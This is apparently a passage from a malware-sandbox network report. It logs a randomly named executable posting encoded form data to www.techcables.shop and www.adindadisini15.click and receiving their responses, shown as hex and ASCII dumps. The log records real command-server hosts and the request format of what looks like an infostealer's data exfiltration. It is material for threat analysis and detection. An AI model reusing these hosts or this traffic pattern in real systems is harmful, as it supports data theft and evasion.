                                        Data Raw: 32 61 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5d 77 9a 30 18 80 ef f7 2b 18 17 3d db 39 53 10 b4 96 15 ba d3 ba aa 58 d4 ae b5 22 dc f4 c4 24 35 a1 21 a1 12 40 bb b3 ff 3e c4 9e 4a 8f bb 59 2e 48 de 97 f7 f3 c9 87 fd f9 e7 b4 37 0b 6e af 15 22 63 76 f1 c9 de 4d 0a 03 7c e5 a8 98 ab 17 9f 94 72 d8 04 03 b4 5f 56 62 8c 25 50 20 01 eb 14 4b 47 7d 98 f5 1b 67 6f 96 87 df 44 ca a4 81 5f 32 9a 3b ea a6 91 81 06 14 71 02 24 5d 32 ac 2a 50 70 89 79 e9 eb 5e 3b 18 ad f0 91 37 07 31 76 d4 9c e2 22 11 6b 59 73 28 28 92 c4 41 38 a7 10 37 2a e1 9b 42 39 95 14 b0 46 0a 01 c3 4e ab a9 d7 c3 49 2a 19 be b0 b5 fd 5c b5 53 15 c9 45 0a d7 34 91 87 b6 fe 5d fb 1a 3f ad 71 4a 6a 25 e8 e7 d9 9a 39 bb fe be 6b 5a 51 14 5d bd 29 31 24 10 94 ad a5 cd 94 88 44 53 15 ed 10 d7 d6 8e 73 d9 15 c2 3a a3 e3 3c 9d ff c8 63 6b 87 2d b2 97 02 6d 15 c1 99 00 c8 51 91 78 dc 2f bf 7c ad 63 d9 37 af c8 6d 52 72 96 78 23 b5 08 e4 60 af ad d9 ed 98 3c 65 1c 4a 2a b8 52 0b a5 fc 7e 27 b9 33 d9 8d 82 72 24 8a a6 14 49 93 09 58 ee b4 e0 [TRUNCATED]
                                        Data Ascii: 2a2]w0+=9SX"$5!@>JY.H7n"cvM|r_Vb%P KG}goD_2;q$]2*Ppy^;71v"kYs((A87*B9FNI*\SE4]?qJj%9kZQ])1$DSs:<ck-mQx/|c7mRrx#`<eJ*R~'3r$IXMRv8zuJ'Yc8(-?YFn[5zW'B~Ug:{hQK,FnSV2q1Hw@bJrd"w,0H4\3h0MK{<h0o%z~$0:3I1\6RO|I/p^\[$4`&!$K{Q|<_,cym{qIZ&";<Iw_|L+`nEn$VnYUM>2c>(\\c\19Y]-,zlH|0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        22192.168.2.651219194.195.220.41805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:18.955545902 CEST864OUTPOST /0hup/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Origin: http://www.techcables.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 237
                                        Referer: http://www.techcables.shop/0hup/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 51 47 4a 77 32 67 41 47 32 62 6e 30 6d 34 50 6f 6b 64 4f 6d 55 7a 46 73 52 4f 6d 74 54 66 32 6d 56 36 42 66 73 46 55 63 5a 4b 51 79 6d 52 56 74 58 5a 34 55 36 52 47 69 67 6c 50 68 4a 56 6d 6f 63 52 78 68 30 4a 2f 54 68 5a 49 56 50 2f 45 65 61 52 50 6b 70 31 34 46 41 75 54 31 73 77 42 57 6d 59 59 31 52 4d 6b 50 2b 63 44 67 6c 70 68 62 6d 78 4e 30 52 64 59 2b 72 78 38 2b 6c 73 59 64 71 30 6e 79 48 7a 32 39 39 6a 4a 66 51 48 38 54 4a 63 45 41 4f 51 79 37 4f 64 57 63 78 70 31 41 76 66 66 7a 48 33 66 36 61 59 77 32 6c 51 75 73 45 4d 71 48 75 51 6b 7a 4f 6f 4a 65 39 75 39 4e 4e 2f 76 68 64 54 45 2b 34 56 75 35 7a 69 56 42 58 44 6d 79 43 30 67 4f 77 55 70 59 2b 58 55 6b 55 77 3d 3d
                                        Data Ascii: mvjDMBx8=QGJw2gAG2bn0m4PokdOmUzFsROmtTf2mV6BfsFUcZKQymRVtXZ4U6RGiglPhJVmocRxh0J/ThZIVP/EeaRPkp14FAuT1swBWmYY1RMkP+cDglphbmxN0RdY+rx8+lsYdq0nyHz299jJfQH8TJcEAOQy7OdWcxp1AvffzH3f6aYw2lQusEMqHuQkzOoJe9u9NN/vhdTE+4Vu5ziVBXDmyC0gOwUpY+XUkUw==
                                        Aug 27, 2024 08:43:19.474562883 CEST865INHTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:19 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 5d 77 9a 30 18 80 ef f7 2b 18 17 3d db 39 53 10 b0 96 15 ba d3 ba aa 58 d4 ae b5 22 dc f4 c4 24 35 b1 21 a1 12 40 bb b3 ff 3e c4 9e 4a 8f bb 59 2e 48 de 97 f7 f3 c9 87 f3 f9 e7 a4 3b 0d 6f af 15 22 63 76 f1 c9 d9 4d 0a 03 7c e9 aa 98 ab 17 9f 94 72 38 04 03 b4 5f 56 62 8c 25 50 20 01 eb 14 4b 57 7d 98 f6 1a 67 6f 96 87 df 44 ca a4 81 5f 32 9a bb ea a6 91 81 06 14 71 02 24 5d 30 ac 2a 50 70 89 79 e9 eb 5d bb 18 2d f1 91 37 07 31 76 d5 9c e2 22 11 6b 59 73 28 28 92 c4 45 38 a7 10 37 2a e1 9b 42 39 95 14 b0 46 0a 01 c3 6e ab a9 d7 c3 49 2a 19 be 70 b4 fd 5c b5 53 15 c9 45 0a d7 34 91 87 b6 fe 5d fb 1a 3f ad 71 4a 6a 25 e8 e7 d9 9a b9 bb fe be 6b 5a 51 14 1d bd 29 31 24 10 94 ad a5 cd 94 88 44 53 15 ed 10 d7 d1 8e 73 39 15 c2 3a a3 e3 3c ed ff c8 e3 68 87 2d 72 16 02 6d 15 c1 99 00 c8 55 91 78 dc 2f bf 7c ad 63 d9 37 af c8 6d 52 72 96 78 23 b5 15 c8 c1 5e 5b b3 db 31 79 ca 38 94 54 70 a5 16 4a f9 fd 4e 72 67 b2 1b 05 e5 48 14 4d 29 92 26 13 b0 dc 69 c1 [TRUNCATED]
                                        Data Ascii: 2a1]w0+=9SX"$5!@>JY.H;o"cvM|r8_Vb%P KW}goD_2q$]0*Ppy]-71v"kYs((E87*B9FnI*p\SE4]?qJj%kZQ)1$DSs9:<h-rmUx/|c7mRrx#^[1y8TpJNrgHM)&iJqN2q['dEncXKmiwi}z"$G^.[0~zI+|;^%xG!t4+&,G&2}~B`FQYziiOBcWg[IB|TEwC*>ASWE"!QMz<(~0@7z"={kY9IdYm10hh*{}1=Z,=>Vb>X!Gf=`WULgNz8y~mw4GFV|0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        23192.168.2.651220194.195.220.41805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:21.507898092 CEST1877OUTPOST /0hup/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Origin: http://www.techcables.shop
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 1249
                                        Referer: http://www.techcables.shop/0hup/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 51 47 4a 77 32 67 41 47 32 62 6e 30 6d 34 50 6f 6b 64 4f 6d 55 7a 46 73 52 4f 6d 74 54 66 32 6d 56 36 42 66 73 46 55 63 5a 4b 59 79 6d 69 74 74 58 34 34 55 37 52 47 69 38 31 50 67 4a 56 6e 30 63 56 64 6c 30 4a 7a 44 68 62 77 56 4e 63 38 65 4c 51 50 6b 6a 31 34 46 66 2b 54 30 69 51 42 44 6d 59 4a 2b 52 4d 30 50 2b 63 44 67 6c 72 4a 62 76 45 35 30 54 64 59 78 39 68 38 79 68 73 59 6d 71 30 2b 48 48 7a 43 74 39 54 70 66 51 6e 73 54 50 2f 73 41 47 51 79 35 4c 64 58 50 78 70 35 68 76 66 53 49 48 32 71 66 61 59 45 32 31 56 71 33 52 4d 61 35 76 51 4d 78 62 5a 4e 6d 7a 59 39 48 4b 2b 2b 51 62 54 51 4a 36 6c 2b 42 71 57 56 69 57 79 48 66 49 32 52 37 73 42 31 57 72 31 4e 47 43 65 2b 51 47 35 69 55 64 45 62 56 55 72 6a 6d 71 74 6c 4e 71 45 4c 6d 6a 42 73 47 6e 30 33 4d 6f 66 5a 54 41 4c 48 58 32 6b 31 31 6a 51 54 44 4b 78 6d 67 79 36 61 59 65 6f 6f 62 30 5a 73 38 42 54 6a 59 6d 51 79 42 61 53 43 56 64 51 48 6e 44 39 49 73 57 34 45 52 2f 61 71 52 37 52 6c 46 45 6e 4e 79 44 4b 6f 72 61 [TRUNCATED]
                                        Data Ascii: mvjDMBx8=QGJw2gAG2bn0m4PokdOmUzFsROmtTf2mV6BfsFUcZKYymittX44U7RGi81PgJVn0cVdl0JzDhbwVNc8eLQPkj14Ff+T0iQBDmYJ+RM0P+cDglrJbvE50TdYx9h8yhsYmq0+HHzCt9TpfQnsTP/sAGQy5LdXPxp5hvfSIH2qfaYE21Vq3RMa5vQMxbZNmzY9HK++QbTQJ6l+BqWViWyHfI2R7sB1Wr1NGCe+QG5iUdEbVUrjmqtlNqELmjBsGn03MofZTALHX2k11jQTDKxmgy6aYeoob0Zs8BTjYmQyBaSCVdQHnD9IsW4ER/aqR7RlFEnNyDKoraKlA5OgmnYOqhmBGMmAcIYpKSHDTqOtnRkqSayqwd+pGhIW/eH2U83T0OC1J9i3LXclHnWL0UV/EevWoW59t3dgYwovdPZ+iuuJCyuJnKCmMzK6L9NvX/DUrIvvQqo6W33edt36xcVirbmIidG95HxKihaNtBBTlLFqtyppi1GTXCH0QOvnIVvNBRtTfnD5ssLtLuyadvAEnnHaDwxWSG7cFUwsHUnJ9xpk5g5UOtk2rld4CndNkIn61rhu1aBPLzjBSfRoureoN5M2L7sn/MDNAlMTzpFAxmFgIfcR8I6UnSeLI4DGy5Nb6lYINcHaUmAy8v2LSabnG009JbikUA6zwftfPpIkXtvggOmknZveGg2JfOxms3nUc70O8rjnG1i9EvBfmZNWxw0jo6rFQ+XqYwpIRHGPi9nVjO1jMoxQe3puTtzRRDM5X0ltPjXNO7/XhVzggA1K1IQiOAOwexB+5GcEU9JuvDJSx/V5jwCaLE++7AwdfuV9JqPjcnP58ALYnBt4Hjpi6uenpPvF6r2KKQR2vVWvE7Q0xR6LOpDrFtQLyFiKajzKFZ/uIv0u0PDHJL/Tti/dqmtkqL/BW8M6P+oE8NNkKN8nVLnh2L5OCsWUYGTh9f2zxeGLKZaN8As7sYpPryAxOQI3DP9PaImWu+IKfKfbmlyv [TRUNCATED]
                                        Aug 27, 2024 08:43:22.022088051 CEST865INHTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:21 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Content-Encoding: gzip
                                        Data Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 94 49 73 da 30 14 80 ef f9 15 ae 0f 99 76 a6 e0 95 12 37 76 3a 09 0d 60 c2 92 26 04 63 5f 32 42 52 90 1c 59 72 b0 8c 21 9d fe f7 1a 93 09 ce d0 4b 75 b0 f4 9e df fa 69 71 3f fd 9c 74 a6 e1 ed b5 42 64 c2 2e 4e dc dd a4 30 c0 97 9e 8a b9 7a 71 a2 94 c3 25 18 a0 fd b2 12 13 2c 81 02 09 58 65 58 7a ea c3 b4 db 38 7b b3 3c fc 26 52 a6 0d fc 92 d3 b5 a7 6e 1a 39 68 40 91 a4 40 d2 05 c3 aa 02 05 97 98 97 be fe b5 87 d1 12 1f 79 73 90 60 4f 5d 53 5c a4 62 25 6b 0e 05 45 92 78 08 af 29 c4 8d 4a f8 aa 50 4e 25 05 ac 91 41 c0 b0 67 34 f5 7a 38 49 25 c3 17 ae b6 9f ab 76 aa 22 b9 c8 e0 8a a6 f2 d0 d6 bf 6b 5f e1 a7 15 ce 48 ad 04 fd 3c 5f 31 6f d7 df 77 4d 2b 8a a2 ad 37 25 86 04 82 b2 b5 ac 99 11 91 6a aa a2 1d e2 ba da 71 2e b7 42 58 67 74 9c a7 f5 1f 79 5c ed b0 45 ee 42 a0 ad 22 38 13 00 79 2a 12 8f fb e5 e7 2f 75 2c fb e6 15 b9 4d 4b ce 12 6f a4 16 83 35 d8 6b 6b 76 3b 26 4f 39 87 92 0a ae d4 42 29 bf df 49 ee 4c 76 a3 a0 1c 89 a2 29 45 da 64 02 96 3b 2d 78 [TRUNCATED]
                                        Data Ascii: 2a1Is0v7v:`&c_2BRYr!Kuiq?tBd.N0zq%,XeXz8{<&Rn9h@@ys`O]S\b%kEx)JPN%Ag4z8I%v"k_H<_1owM+7%jq.BXgty\EB"8y*/u,MKo5kkv;&O9B)ILv)Ed;-x])`IXqg')imCns*$GZf<+|wJ,N7WLY;$AG94v$4UyPof#Pn{44:|hJcl_e cuEPT/s7Hd>yFt..+d 64"={Xc9idX1Ex4mX>->mX,$G+M8?2c>(8_ssT1'58]r-s,zlPH{|0


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        24192.168.2.651221194.195.220.41805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:24.052992105 CEST586OUTGET /0hup/?AT=RrjDj4Z85jYPlHG0&mvjDMBx8=dEhQ1XEV2cGux7LKlL+scgcBfO64DeKcVe19yXl7eYIZvhBzatxTyUaQx2TCVW77GzJhrYbmnII2KrJyLin2/kNdYev+ljAzma1yOM1J7qbV9Zx9z1N3S/Qs4ysm8OEw2XKCNmo= HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.techcables.shop
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Aug 27, 2024 08:43:24.580380917 CEST1236INHTTP/1.1 200 OK
                                        Server: openresty/1.13.6.1
                                        Date: Tue, 27 Aug 2024 06:43:24 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Data Raw: 35 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 74 65 63 68 63 61 62 [TRUNCATED]
                                        Data Ascii: 530<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.techcables.shop/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.techcables.shop/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.techcables.shop/0hup?gp=1&js=1&uuid=1724741004.9758137820&other_args=eyJ1cmkiOiAiLzBodXAiLCAiYXJncyI6ICJBVD1ScmpEajRaODVqWVBsSEcwJm12akRNQng4PWRFaFExWEVWMmNHdXg3TEtsTCtzY2djQmZPNjREZUtjVmUxOXlYbDdlWUladmhCemF0eFR5VWFReDJUQ1ZXNzdHekpocllibW5JSTJLckp5TGluMi9rTmRZZXYrbGpBem1hMXlPTTFKN3FiVjlaeDl6MU4zUy9RczR5c204T0V3MlhLQ05tbz0iLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBsa [TRUNCATED]
                                        Aug 27, 2024 08:43:24.580403090 CEST260INData Raw: 57 31 68 5a 32 55 76 64 32 56 69 63 43 78 70 62 57 46 6e 5a 53 39 68 63 47 35 6e 4c 43 6f 76 4b 6a 74 78 50 54 41 75 4f 43 78 68 63 48 42 73 61 57 4e 68 64 47 6c 76 62 69 39 7a 61 57 64 75 5a 57 51 74 5a 58 68 6a 61 47 46 75 5a 32 55 37 64 6a 31
                                        Data Ascii: W1hZ2Uvd2VicCxpbWFnZS9hcG5nLCovKjtxPTAuOCxhcHBsaWNhdGlvbi9zaWduZWQtZXhjaGFuZ2U7dj1iMztxPTAuNyIsICJ1cmlfYyI6ICJmNDEwIiwgImFyZ3NfYyI6ICI0OTNkIiwgInJlZmVyZXJfYyI6ICI0Njg5IiwgImFjY2VwdF9jIjogIjZiNzkifQ=="; } </script> </bod


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        25192.168.2.651222172.96.186.147805700C:\Program Files (x86)\DgWouDSUmcNQAkXyvakNAZBPuQwMTPuzBeXCsqhueWhIbySvWSCDhE\uExImirYECsTjI.exe
                                        TimestampBytes transferredDirectionData
                                        Aug 27, 2024 08:43:29.895638943 CEST855OUTPOST /vufj/ HTTP/1.1
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en;q=0.9
                                        Host: www.adindadisini15.click
                                        Origin: http://www.adindadisini15.click
                                        Content-Type: application/x-www-form-urlencoded
                                        Connection: close
                                        Cache-Control: no-cache
                                        Content-Length: 213
                                        Referer: http://www.adindadisini15.click/vufj/
                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1526 Build/LPI23.29-18-S.2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                        Data Raw: 6d 76 6a 44 4d 42 78 38 3d 7a 46 72 5a 44 45 73 4d 44 6a 6c 63 37 41 61 75 61 51 66 68 79 71 4a 75 68 34 45 6e 69 36 69 61 59 4e 56 48 41 31 75 5a 73 75 64 52 6c 71 44 6e 79 6c 77 6d 6f 2f 7a 48 6b 35 49 6f 67 65 4a 4d 79 2f 76 63 4b 56 2b 62 73 6e 36 54 71 66 47 36 53 76 34 63 6f 4d 6c 76 70 45 42 53 71 69 49 64 69 68 51 59 35 43 53 45 57 50 4d 4f 68 53 6a 78 4e 69 52 4d 39 7a 58 55 44 6e 71 59 68 54 62 49 43 42 72 6d 6d 39 6a 6b 69 53 39 2b 78 78 6b 76 55 2f 6b 6b 61 69 67 52 77 70 4f 78 79 43 4b 35 76 47 6d 56 6c 70 48 61 6f 48 42 51 6a 59 48 48 34 57 78 61 6c 47 56 4d 61 45 58 66 50 5a 6d 42 58 6e 39 4f 67 76 38 56 58 43 38 43
                                        Data Ascii: mvjDMBx8=zFrZDEsMDjlc7AauaQfhyqJuh4Eni6iaYNVHA1uZsudRlqDnylwmo/zHk5IogeJMy/vcKV+bsn6TqfG6Sv4coMlvpEBSqiIdihQY5CSEWPMOhSjxNiRM9zXUDnqYhTbICBrmm9jkiS9+xxkvU/kkaigRwpOxyCK5vGmVlpHaoHBQjYHH4WxalGVMaEXfPZmBXn9Ogv8VXC8C
                                        Aug 27, 2024 08:43:30.551156998 CEST1236INHTTP/1.1 404 Not Found
                                        Connection: close
                                        x-powered-by: PHP/7.4.33
                                        x-litespeed-tag: a7b_HTTP.404
                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        content-type: text/html; charset=UTF-8
                                        link: <https://adindadisini15.click/wp-json/>; rel="https://api.w.org/"
                                        x-litespeed-cache-control: no-cache
                                        cache-control: no-cache, no-store, must-revalidate, max-age=0
                                        transfer-encoding: chunked
                                        content-encoding: gzip
                                        vary: Accept-Encoding
                                        date: Tue, 27 Aug 2024 06:43:30 GMT
                                        server: LiteSpeed
                                        Data Raw: 33 33 62 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d fd 77 db 36 b2 e8 cf f6 5f 81 d0 a7 b1 98 92 14 49 7d 58 a6 2d ef 6d 93 f6 6e df 6b 6f 7b 9a 76 ef bb af c9 c9 81 48 48 62 42 91 5c 10 b2 ec 7a fd bf bf 33 03 f0 53 a4 24 cb e9 f6 de 3d af 69 1c 13 1f 33 83 01 30 98 19 0c 80 eb 17 6f 7e 7c fd cb 7f fd f4 0d 59 8a 55 74 73 7a 0d ff 90 88 c6 8b a9 c6 62 f3 d7 b7 1a a4 31 1a dc 9c 9e 5c af 98 a0 c4 5f 52 9e 31 31 d5 7e fd e5 5b 73 a2 91 7e 91 13 d3 15 9b 6a b7 21 db a4 09 17 1a f1 93 58 b0 58 4c b5 4d 18 88 e5 34 60 b7 a1 cf 4c fc 30 48 18 87 22 a4 91 99 f9 34 62 53 07 e1 48 04 08 e6 9c 27 b3 44 64 e7 05 90 f3 15 bd 33 c3 15 5d 30 33 e5 0c 90 78 11 e5 0b 76 0e 04 5c 8b 50 44 ec e6 27 ba 60 24 4e 04 99 27 eb 38 20 2f cf 26 ae e3 5c 11 1a 84 71 40 83 30 0b e3 d0 19 59 7e 14 fa 9f ae fb b2 ca e9 75 14 c6 9f 08 67 d1 f4 3c 88 33 80 3d 67 c2 5f 9e 93 25 67 f3 e9 79 bf df 56 5b 22 2d 6a 6a 34 12 8c c7 54 30 8d 88 fb 94 4d 35 9a a6 51 e8 53 11 26 71 9f 67 d9 97 77 ab 48 23 88 71 aa b5 01 24 2f 39 fd fb 3a [TRUNCATED]
                                        Data Ascii: 33ba}w6_I}X-mnko{vHHbB\z3S$=i30o~|YUtszb1\_R11~[s~j!XXLM4`L0H"4bSH'Dd3]03xv\PD'`$N'8 /&\q@0Y~ug<3=g_%gyV["-jj4T0M5QS&qgwH#q$/9:"2h"vsAdb'W5e>Sqs X6)[%L0^ddJ<<wwX_cg~>V~wFm/]_34v'4OxZv8^v@h0EL4?}*E&5?fUM"F3f[xu32#FHU|0zv1OLuscW,tzm*nh~eYoEY%zXa=>=>3,?b|`O[YRK.B75v'z[)Pk
                                        Aug 27, 2024 08:43:30.551182985 CEST1236INData Raw: df 81 34 78 43 05 3d 04 b4 15 50 41 75 83 4f 7b cf a0 29 46 9a 8c cf 45 8d 7e c5 99 58 f3 98 08 8b dd 32 7e df cb 19 08 ec d3 1f 54 26 9b 4e a7 fc 37 f1 fe 51 2f 19 bc ce 19 9c 6d 42 60 bf d0 1f 7c 9a 31 6d 1e d1 85 e6 a9 8a 71 8f 19 da bb 75 30
                                        Data Ascii: 4xC=PAuO{)FE~X2~T&N7Q/mB`|1mqu0|>x3{nvnL:jpu(\/_6@w`6|Q>*W_B_Hq@b^fR.)sM.PAAcEV?*NaR6c
                                        Aug 27, 2024 08:43:30.551193953 CEST1236INData Raw: 4a 93 83 27 80 05 7a 83 ba cb cb cb cb f4 ee 11 ba 1e 7a fc e6 b4 b3 e7 d1 68 af 77 fd 2e ec 58 9c 50 fd c1 4f a2 84 17 5c d8 8d 68 c1 93 35 18 8b ad c3 0b 33 db 87 d6 e3 16 07 b0 70 c9 10 05 38 33 23 7a 9f ac 85 e9 27 71 26 38 05 95 51 7f 48 93
                                        Data Ascii: J'zzhw.XPO\h53p83#z'q&8QH,#,"e{%3EiLo<HIBQ{[e-=,+bC+S80k<bwWB&](cig%4~qp~LVgURe+*9]vO9-uUKR8,(~
                                        Aug 27, 2024 08:43:30.551208019 CEST1236INData Raw: da 92 cb 21 fc 91 b6 e5 82 27 1b cf 51 f3 59 8a 59 3b ff 92 f2 d8 ae 70 1d 75 91 9c 09 93 f4 4e ce f8 80 f9 09 47 e3 d8 5b c7 19 13 2f c2 15 ec c8 d2 b8 e6 22 41 22 4b e3 b9 ce 70 5c a7 2a 86 63 3d f7 01 d9 95 2d 79 18 7f f2 0a f2 50 24 c0 57 97
                                        Data Ascii: !'QYY;puNG[/"A"Kp\*c=-yP$Wc<&K)XO#$mwHxjKFldVl)OR>z;U|Zu5mw!Sme05X\*P\Vsg#x[+}dWp>-`~5
                                        Aug 27, 2024 08:43:30.551222086 CEST1236INData Raw: 24 16 9c de 57 62 1b e4 08 db 8e ed 38 63 8c 6d 41 80 21 64 1e 0a 60 e0 c0 9f 2d 18 15 2a 90 fb ca fd be 07 5f ad 68 0b e4 f0 36 0c cc 05 84 89 9b fe 3d 8d 4d 91 98 b7 98 86 5f b3 68 cd 80 ee 20 64 b1 a8 34 be d2 6c 0f 8c 5e ca 8b 52 3d 67 30 0a
                                        Data Ascii: $Wb8cmA!d`-*_h6=M_h d4l^R=g083{|9`t>_geClx:_gtsVCSqf~vkP7h628_SOE}WGzcHG51kX;}0/l?_?n8s'
                                        Aug 27, 2024 08:43:30.551234007 CEST1120INData Raw: 95 b8 87 11 75 52 24 ca 92 1b 28 94 76 e3 af a0 52 dd e0 da 17 c6 70 6c 0c c7 fb f8 d0 74 0e 89 44 fa 50 66 d1 ba 14 c3 dd d8 7b ee 60 62 a8 bf 45 27 38 e3 4b c3 99 0c 0d e7 72 b4 0f bd 9f 24 11 34 75 43 f9 ca c4 15 93 af 57 1e d9 81 f0 62 68 b8
                                        Data Ascii: uR$(vRpltDPf{`bE'8Kr$4uCWbh!t|o]Ny`brx4lN&Epb/fP?epTp.i`VbCvxT`tt5t/:p8n\%L`CU3;
                                        Aug 27, 2024 08:43:30.551246881 CEST892INData Raw: 54 1d 69 cb 6b b7 b2 48 6d 4c c9 c0 4d dc 33 05 5a c1 b7 af 2e 69 81 93 99 3a b9 21 2d fc 95 95 8a 58 63 ec 75 a3 d2 62 1d 06 48 de bd aa 07 ec b2 8b 25 77 ed 8e be fb 83 09 6b ef 99 82 24 75 84 b5 24 7a 6b 70 e7 00 a0 0a 79 20 f2 10 00 81 af a2
                                        Data Ascii: TikHmLM3Z.i:!-XcubH%wk$u$zkpy TmZ&G^ @n<+&2((i@?fJNcWDVwcq|1g.5@%/c$TCJE:Wh'T,n\*ZIV"z:g81r
                                        Aug 27, 2024 08:43:30.551259041 CEST1236INData Raw: 95 81 b8 9d ad 92 77 54 1d 33 64 ff d0 56 29 9f db de 55 be 9c 3f 79 0d 15 8e 48 e0 b4 d1 5e de 50 1f ae a5 ed 64 8e cc 3e 72 42 3f b7 fb 7c 9a c2 01 a5 2a 71 74 1d 84 09 99 87 8b 96 3c b6 9a b1 a0 23 6f 41 a3 88 f1 fb 8e 5c 8c 21 ed c8 13 10 95
                                        Data Ascii: wT3dV)U?yH^Pd>rB?|*qt<#oA\!wJ7e[/G#ee^<.9\Zdl<mQD>(<VQVI"h'{{~2(XC#@@4cZ K!pBnVk\<nRT8l
                                        Aug 27, 2024 08:43:30.551273108 CEST1236INData Raw: 64 bc 6b 96 e2 f9 4d 01 4d f8 03 66 e9 53 80 77 ce 52 bc 8d f7 f1 b4 12 da 5c 39 73 4a 5e a9 f7 75 f3 87 ce d4 23 7d 10 f7 9b c7 02 cb c3 36 f2 06 de 0e 09 e7 d3 88 c5 01 e5 e5 58 cd 53 08 c6 be 2a e4 f2 fc 58 71 ef 35 7a d6 75 9d 88 65 4b 70 f0
